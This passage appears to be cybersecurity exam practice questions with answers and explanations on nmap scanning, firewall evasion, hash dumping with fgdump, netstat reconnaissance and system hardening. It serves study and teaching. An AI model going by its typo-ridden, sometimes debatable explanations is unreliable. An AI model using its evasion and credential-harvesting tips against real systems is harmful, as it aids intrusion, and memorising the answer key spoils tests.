D.None of the above Explanation: Casey knows that she saw three open ports and that nmap took its because guess at what was running on those ports. In this case, the system is actually a Kali Linux system, a Debian distribution. This is not a CIsco device, it is not running CentOS and it was not built by IBM
After Kristen received a copy of an nmap scan run by a penetration tester that her company hired, she knows that the test used the -O flag. What type of information should she expect to see included in the output other than the open ports? A.OCMP status B.Other ports C.Objective port assessment data in verbose mode D.Operating system and Common Platform Enumeration (CPE) data
D.Operating system and Common Platform Enumeration (CPE) data Explanation: nmap provides Common Platform Enumeration data when the -O (OS fingerprinting) and verbose flags are used. If Kristen had seen the -sV flag instead, she would have expected service version information
Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP and web servers. What is his best option to secure these systems? A.Enable host firewalls B.Install patches for those services C.Turn off the services for each appliance D.Place a network firewall between the devices the rest of the network
D.Place a network firewall between the devices the rest of the network Explanation: Geoff's only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default; since they are appliances, they may not have host firewalls available to enable. They also often dont have patches available, and many appliances do not allow the services they provide to be diabled or modified
Cassandra believes that attackers were able to extract a volume shadow copy of a workstation belonging to her organization's Window domain administrator. What information should she not report as being potentially exposed? A.All files on the users desktop B.Password hashes C.Domain details D.Plain-text Windows account passwords
D.Plain-text Windows account passwords Explanation: Cassandra should report that password hashes, user files, and domain details may have been exposed. Windows does not store plain-text Windows account passwords, so this should not be a concern unless the administrator keeps them in a file
Stacey encountered a system that shows as "filtered" and "firewalld" during an nmap scan. Which of the following techniques should she not consider as she is planning her next scan? A.Pakcet fragmentation B.Spoofijng the source address C.Use decoy scans D.Spoofing the destination address
D.Spoofing the destination address Explanation: nmap has a number of built-in anti-firewall capabilities including packet gragmentation, decoy scans, spoofing of source IP and source port, and scan timing techniques that make detection less likely. Spoofing the target IP address wont help; her packets still need to get to the actual target
How can Saria remediate the issue shown here in the MBSA screenshot? A.Force all users to set a complex password B.Set a minimum password age C.Enforce password expiration D.This is not a problem
D.This is not a problem Explanation: The accounts shown are disabled, and disabled accounts with a weak password are typically not a problem. If they are an issue, Saria's best option would be to delete the accounts unless they are required for a specific purpose
Cynthia knows that the organization she is scanning runs services on alternate ports to attempt to reduce scans of default ports. As part of her intelligence-gathering process, she discovers services running on ports 8080 and 8443. What services are most likely running on these ports? A.Botnet C&C B.Nginx C.Micorosft SQL Server instances D.Web servers
D.Web servers Explanation: Many system administratos have histroically chose 8080 and 8443 as the alternate service ports for plain-text and secure web services. While these ports could be used for any service, it would be reasonable for Cynthia to guess that a pair of services with ports like these belong to web servers
Adam needs to provide ssh access to systems behind his data center firewall. If Adam's organization uses the system architecture shown here, what is the system at point A called? A. a firewall-hopper B.an isolated system C.a moat-protected host D.a jump box
D.a jump box Explanation: Adam is using a jump box to provide access. A jump box, sometimes called a jump server or secure administrative host, is a system used to manage devices in a separate, typically higher security zone. This prevent administrators from using a less secure administrative workstation in the high security zone
What command can Amanda use to terminate the process? A.term B.stop C.end D.kill
D.kill Explanation: The kill command is used to end processes in Linux. Amanda should issue the kill -9 command followed by the process ID of the processes she wants to end (the -9 flag is the signal and means "really try hard to kill this process") Since she has run both top and htop, she knows that she needs to end processes 3843 and 3820 to stop stress from consuming all of her resources. A little research after that will show her that stress is a stress testing application, so she may want to ask the user who ran it why they were using it if it wasnt part of her job!
During a network reconnaissance exercise, Chris gains access to a PC located in a secure network. If Chris wants to locate database and web server that the company uses, what command-link tool can he use to gather information about other systems on the local network without installing additional tools or sending additional traffic? A.ping B.tracert C.nmap D.netstat
D.netstat Explanation: Netstat is found on Windows, Linux and macOS systems and can provide information about other systems on the network and can provide information about open ports and systems that the host has connected to. Chris can search for common web and database server service ports to help identify the local targets he is looking for.
Geoff wants to gather a list of all Windows services and their current state using a command-line tool. What tool can he use to gather this information for later processing? A.svcctl -l B.service list C.service -l D.sc query
D.sc query Explanation: The Windows Service Controller, sc, provides command line control of services. COmmands include start,stop, pasure, query, and other service-related commands. Using sc query provides a list of services, their display name, type, state, exit codes, checkpoint and wait hint codes. Geoff can use output like this to check for unexpected services running on the system if he has local commnad-line access for only a limited period of time
Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file? A. grep B.more C.less D.strings
D.string Explanation: The strings command extracts strings of printable characters from files, allowing Ben to quickly determine the contents of files Incorrect answers: Grep would require knowing what he is looking for, either the more or less command will simply display the file, which is often not a useful strategy for binaries
Alex is observing a penetration tester who has gained access to a Windows domain controller. The penetration tester runs a program called fgdump and gathers information from the system What type of information has the penetration tester targeted? A.File and group information B.Passwords and usernames C.Active Directory full GPO lists D.Nothing, because FGDump is a Linux tool
Passwords and usernames Explanation: FGDump is a tool used for Windows password auditing. If successful, it will dump the user and password hash for every user
As a US government employee, Michael is required to ensure that the network devices that he procures have a verified chain of custody for every chip and component that goes into them. What is this program known as? A.Gray market procurement B.Trusted Foundry C.White market procurement D.Chain of procurement
Trusted Foundry Explanation: The US DoD Trusted Foundry program works to assure the integrity and confidentiality of integrated circuit design and manufacturing. This helps to ensure that agents of foreign governments are not able to insert flaws or code into the ICs that could be leveraged for intelligence or cyberwarfare activities